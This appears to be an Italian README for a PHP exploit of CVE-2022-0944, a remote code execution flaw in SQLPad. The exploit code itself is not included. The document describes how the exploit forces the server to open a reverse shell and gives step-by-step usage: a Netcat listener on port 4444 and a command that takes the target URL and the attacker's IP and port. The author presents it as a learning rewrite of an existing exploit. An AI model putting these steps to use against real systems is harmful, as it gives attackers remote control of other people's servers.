
CVE-2022-0944 Exploit di esecuzione remota di codice
Questo codice PHP è progettato per sfruttare una vulnerabilità di Remote Code Execution (RCE) in SQLPad, legata a CVE-2022-0944.
Funziona iniettando codice dannoso nell'applicazione SQLPad, costringendola a eseguire un comando di sistema che apre una reverse shell – una connessione che concede all'attaccante il controllo remoto del sistema vulnerabile.
sudo apt-get install php-clisudo apt-get install php-curlPer catturare la connessione della reverse shell, avvia Netcat sulla macchina dell'attaccante:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: L'URL root dell'SQLPad vulnerabile (es. http://target.com:3000)
<attacker_ip>: L'indirizzo IP dell'attaccante in ascolto per la connessione inversa (lo stesso IP di Netcat)
<attacker_port>: La porta su cui l'attaccante è in ascolto (la stessa porta di Netcat)
La logica originale dell'exploit si basa su questo repository:
🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
Il mio obiettivo qui era comprendere la logica dell'exploit e riscriverla in un altro linguaggio di programmazione come sfida personale.
Riferimento aggiuntivo: 🔗 CVE-2022-0944 – NVD